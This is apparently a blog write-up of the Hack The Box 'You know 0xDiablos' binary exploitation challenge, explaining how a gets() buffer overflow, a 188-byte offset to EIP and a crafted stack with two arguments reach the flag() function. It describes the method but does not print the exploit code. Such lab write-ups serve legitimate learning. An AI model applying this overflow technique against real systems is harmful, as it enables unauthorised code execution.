You know 0xDiablos Hackthebox (PWN)
This is an easy PWN question in Hackthebox. But it does contain some reverse engineering for getting our exploit right. Let’s get started with the challenge
Challenge
We need to check the file type and memory protection in the binary before we begin our exploit.
It is dynamically linked and not stripped. Also, there is no PIE and the NX bit is not switched ON. We could try finding some interesting functions that we could use here. To find all the functions I used “info function” in GDB.
We have 2 function vuln() and flag(). Before going through these functions, let us disassemble “main”.
We can see a call to vuln() function in the main(). Nothing vulnerable in main().
Next we disassemble the vuln() function. We can see gets() being used here. So that opens up a possibility for a buffer overflow. To do this we need to overflow the buffer, Padding, and EBP to reach EIP. We could use “pattern create 200” inside GDB-peda to create a random pattern of 200 characters. Now run the binary with the following pattern inside GDB.
Notice how the registers have changed. EBP and EIP have been overwritten with the pattern we gave as input. Now to find the starting offset of EIP, we could use “pattern offset”.
So 188 random characters to overwrite Buffer, padding, and EBP value.
Next, we need to disassemble the flag() to see what we could do with this function. This part took some time to understand as there were string compare functions called. I did a bit of reverse engineering here, But failed to understand. So I used Cutter to understand what they have done here.
We can see a call to fgets() and then “if” check. Here it took me a while to figure out what is happening. Clearly, another input is been taken in and this time we need to supply 2 inputs (arguments). So we need to see clear stack anatomy before we proceed here.
We need to give the arguments after the return address. But obviously, they missed a small portion here. After the return address, we have 4 bytes of space before we give our arguments. So ill draw the full stack diagram
So I made my exploit accordingly in python
Don’t forget to change your host and port value. Executing this will give our flag.
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more writeups.
Goodbye:)
